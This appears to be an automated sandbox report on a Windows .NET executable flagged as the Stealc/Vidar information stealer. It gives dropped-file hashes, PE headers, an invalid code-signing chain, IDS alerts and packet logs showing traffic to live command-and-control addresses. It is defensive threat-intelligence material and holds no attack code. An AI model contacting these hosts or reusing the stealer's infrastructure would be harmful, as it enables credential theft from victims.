                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):42
                                                                                                                                                                            Entropy (8bit):4.0050635535766075
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                            MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                            SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                            SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                            SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                            Entropy (8bit):2.8150724101159437
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:+MEM:+BM
                                                                                                                                                                            MD5:AEE9784C03B80D38D3271CDE2B252B8D
                                                                                                                                                                            SHA1:E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524
                                                                                                                                                                            SHA-256:27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
                                                                                                                                                                            SHA-512:A83C2F678A77228F5C7F2FB61A723217892B8422913739D1C65CB97701C341361EEEE617E9D050A86B552DB4DD87B18CFB94443977A75A5862171346609E9472
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Unknown error
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):34879
                                                                                                                                                                            Entropy (8bit):5.398474878938413
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:Mdpqme0Ih+3tAA6WGWefcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2N:Md8me0Ih+3tAA6WGWeFhTBv++nIjBtPR
                                                                                                                                                                            MD5:2D2B0BE510590CE0A0E7185150678633
                                                                                                                                                                            SHA1:E8118C92C257C5E3BFCB2DDDA851F02D9A99BBF0
                                                                                                                                                                            SHA-256:14054ABADFD5540F5CC3B80EA7D2A0B26CD158BD63223E7EE4E3CF34DBC0011A
                                                                                                                                                                            SHA-512:2A5E53D37B9D6F56A8CA8EC326DFEE40D3D766CA94DDF371770A7E319F622DC547C39320D2836469294290608709909C4EC2750F2BF48BE879A9A4EAAE209CD0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.197.9|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href=
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1048575
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:t:t
                                                                                                                                                                            MD5:2A8888F6512F29288846E65FB6F83C9B
                                                                                                                                                                            SHA1:6147D53026A83E59234FF853BB2B558B208B423F
                                                                                                                                                                            SHA-256:4AEF39E4090B33644513AB820B07DDFA7DB4F8C9A3B201E2D789433D6D20BECC
                                                                                                                                                                            SHA-512:907BD31C64A819EEA40612FEB436D3F42B748566DEE4849A30C301E1A727FD899805550377D60BF54BDBA3FB7B12D0F820DB9B8BB05E37C5B386348A2D79580D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):601600
                                                                                                                                                                            Entropy (8bit):6.954085346038613
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:WykgNnlqotaCsq/0TTrG7dKM9KwdTVXs:WknLtaCsJyAJ
                                                                                                                                                                            MD5:A7303605203C978ABBEFB4033275FF0C
                                                                                                                                                                            SHA1:6779D8CEB4551F3DBA684645EE2E794C3ADE90B5
                                                                                                                                                                            SHA-256:0B1BB1E0D8BF15E28CC4528BF52153429B6318FD61B3733B6B8C86947820BFF4
                                                                                                                                                                            SHA-512:1F1BED9DF20F88AC34B118AEDB3B13FF67656A982A5909072AD2C3AA5E946C3BC1968EA564004630E4DC7F8E642B14A433265160BCB2EE845608322C98575105
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                            Entropy (8bit):4.391136854628721
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:Zl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuN1xOBSqa:v4vF0MYQUMM6VFYLxU
                                                                                                                                                                            MD5:DCD88EA6B7305254DE47653C23AEB417
                                                                                                                                                                            SHA1:CF9B3AFC4F2D6B2775780C4FEAA3C4B0633A6BE9
                                                                                                                                                                            SHA-256:D952AB8B198AFDC603CEE5F43625F6F7843739C63729FDE7B314100F5A153643
                                                                                                                                                                            SHA-512:0BF7C7CAE03E5076F81D2A854F2CBAD9AE06AC18D9C6F9A2B21039937ED3A2F0E833CF54E8847BE73AFB3A1A97EC1B0484E2C7B87C2B28B7A5AE1217F8168535
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Entropy (8bit):7.8915038656026955
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                            File name:file.exe
                                                                                                                                                                            File size:421'040 bytes
                                                                                                                                                                            MD5:d5251bd2a4d9ee464b1dbb25245a67a7
                                                                                                                                                                            SHA1:a89c28d0c6f39475cf96c2129c4d10d73d0aa4b4
                                                                                                                                                                            SHA256:5aa5f829532b82d1d146841d843de9d3ab2278ba2c52402d51d18a5a2823872f
                                                                                                                                                                            SHA512:6a42887328eac8fc4036b08c01dd952ee7ee3640172e86cb4fd9654372ff8903ab8a616602e0f67f4192d63506bf92a6346b8ce3017eccbeab26c221e0451c4b
                                                                                                                                                                            SSDEEP:12288:7FWiaocklk/TYrcwBXCqE3iclBZkmYaugcCkVkNao:BzCcrPyqE7BOmYo
                                                                                                                                                                            TLSH:FB94CF9D765071DFC86BC8719AA82CB4FE6078BA472B4143A02712EE9E4D997CF540F3
                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................b............... ....@.. ....................................@................................
                                                                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                                                                            Entrypoint:0x46800a
                                                                                                                                                                            Entrypoint Section:
                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            Subsystem:windows cui
                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                            Time Stamp:0x66FDF1E0 [Thu Oct 3 01:22:40 2024 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                            File Version Major:4
                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                            Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                            • 22/03/2021 00:00:00 21/03/2024 23:59:59
                                                                                                                                                                            Subject Chain
                                                                                                                                                                            • CN=Gary Kramlich, O=Gary Kramlich, STREET=2653 N 54TH ST, L=MILWAUKEE, S=Wisconsin, PostalCode=53210, C=US
                                                                                                                                                                            Version:3
                                                                                                                                                                            Thumbprint MD5:394B591BC2CE78B7CF207BF4082E62F4
                                                                                                                                                                            Thumbprint SHA-1:ADFA744AA074FB5DC57EE6445A3E18D606C7BF96
                                                                                                                                                                            Thumbprint SHA-256:AE7DB8B64E8ABD9D36876F049B9770D90C0868D7FE1A2D37CF327DF69FA2DBFE
                                                                                                                                                                            Serial:00F6AD45188E5566AA317BE23B4B8B2C2F
                                                                                                                                                                            Instruction
                                                                                                                                                                            jmp dword ptr [00468000h]
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x58768 | 0x53 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x738 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x61000 | 0x5cb0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x66000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x68000 | 0x8 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x58000 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| JO_E58 | 0x2000 | 0x556f4 | 0x55800 | d50232da462c35260a6395f254dc4e41 | False | 1.0003312317251463 | data | 7.9994803282182785 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .text | 0x58000 | 0xa7b0 | 0xa800 | 117f817fe3f3fe1d52eca823120bcdaf | False | 0.3886021205357143 | data | 4.727908855420412 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x64000 | 0x738 | 0x800 | 27efb118827f19f9b26ee53766cf517b | False | 0.39306640625 | data | 3.840654797805224 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x66000 | 0xc | 0x200 | 354e5ffc7f8a670c981da5a85608e4ce | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| | 0x68000 | 0x10 | 0x200 | d94c8b594fef15b4030e460f1415aa2d | False | 0.044921875 | data | 0.14263576814887827 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_VERSION | 0x640a0 | 0x4a8 | data | | | 0.4203020134228188 |
| RT_MANIFEST | 0x64548 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041 |
| DLL | Import |
| mscoree.dll | _CorExeMain |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| 2024-10-03T03:26:45.002063+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49712 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:26:46.181996+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49713 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:26:47.706893+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49714 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:26:48.401039+0200 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.9 | 49714 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:26:49.063115+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49715 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:26:49.759104+0200 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 49.12.197.9 | 443 | 192.168.2.9 | 49715 | TCP |
| 2024-10-03T03:26:50.472209+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49716 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:26:51.174591+0200 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 49.12.197.9 | 443 | 192.168.2.9 | 49716 | TCP |
| 2024-10-03T03:26:51.910409+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49717 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:26:53.184930+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49718 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:26:56.335592+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49719 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:26:57.427072+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49720 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:26:59.780100+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49721 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:27:01.221985+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49722 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:27:03.387792+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49723 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:27:06.072223+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49724 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:27:08.017523+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49725 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:27:09.758776+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49726 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:27:11.287167+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49727 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:27:14.650634+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49729 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:27:16.347761+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49730 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:27:17.745181+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49731 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:27:19.571326+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49732 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:27:21.565877+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49733 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:27:23.962749+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49734 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T03:27:25.798987+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49735 | 147.45.44.104 | 80 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                                                            Oct 3, 2024 03:26:46.871320009 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.871336937 CEST4434971349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.871351004 CEST4434971349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.871381044 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.871409893 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.922250032 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.922270060 CEST4434971349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.957842112 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.957874060 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.957963943 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.958199024 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.958213091 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:47.706810951 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:47.706892967 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:47.707401991 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:47.707410097 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:47.709131956 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:47.709136963 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401067019 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401087046 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401145935 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401164055 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401176929 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401194096 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401194096 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401232004 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401473999 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401485920 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.410446882 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.410492897 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.410573959 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.410803080 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.410820961 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.062926054 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.063114882 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.063869953 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.063879967 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.065705061 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.065711975 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.758868933 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.758893013 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.758960009 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.758976936 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.759000063 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.759032011 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.772377968 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.772401094 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.827914000 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.827975988 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.828044891 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.828737974 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.828752995 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:50.472054005 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:50.472208977 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:50.472757101 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:50.472762108 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:50.475025892 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:50.475030899 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174259901 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174350023 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174365997 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174386024 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174415112 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174433947 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174537897 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174554110 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.261873960 CEST49717443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.261923075 CEST4434971749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.262007952 CEST49717443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.262231112 CEST49717443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.262242079 CEST4434971749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.910315990 CEST4434971749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.910408974 CEST49717443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.911379099 CEST49717443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.911391973 CEST4434971749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.913260937 CEST49717443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.913268089 CEST4434971749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.913330078 CEST49717443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.913347960 CEST4434971749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:52.512317896 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:52.512383938 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:52.512470007 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:52.513076067 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:52.513106108 CEST4434971849.12.197.9192.168.2.9
